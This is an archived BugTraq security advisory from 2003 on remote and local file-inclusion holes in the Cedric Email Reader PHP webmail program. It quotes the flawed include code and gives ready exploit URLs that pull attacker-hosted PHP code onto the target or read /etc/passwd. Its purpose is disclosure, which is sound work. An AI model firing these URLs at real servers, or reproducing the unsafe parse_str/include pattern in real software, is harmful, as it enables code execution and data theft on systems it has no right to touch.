BugTraq
Cedric Email Reader (PHP) Feb 09 2003 10:05AM
MGhz (magas mail lt)


Version : 0.2;0.3;0.4

Website : http://www.isoca.com/

Problems :Include file (local, remote)

Version: 0.2;0.3

File:

---------------------------------

email.php3 (version 0.2) ; email.php (version 0.3)

---------------------------------

PHP Code:

---------------------------------

[...]

require('emailreader.ini');

if ($login > "") {

parse_str($param);

include($cer_skin);

include('email.inc');

$mbox = openimap($server, $username, $password);

$text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));

[...]

---------------------------------

Exploit :

---------------------------------

http://[target]/email.php?login=attacker&cer_skin=http://

[attacker]/code.php

-->

include http://[attacker]/code.php on remote server

---

include local file

-->

http://[target]/email.php?login=attacker&cer_skin=/etc/passwd

---------------------------------

Versions: 0.4

File:

---------------------------------

webmail/lib/emailreader_execute_on_each_page.inc.php

---------------------------------

PHP Code:

---------------------------------

[...]

$param = imap_base64($login);

parse_str($param);

@include($emailreader_ini);

@include('lib/'.$server_type.'.inc.php');

@include('skin/emailreaderskin_'.$lang.'.php');

[...]

---------------------------------

Exploit :

---------------------------------

http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?

emailreader_ini=http://[attacker]/code.php

-->

include http://[attacker]/code.php on remote server

---

include local file

-->

http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?

emailreader_ini=/etc/passwd

---------------------------------

--

(if registers_global=ON)

--

--

magas (at) mail (dot) lt [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus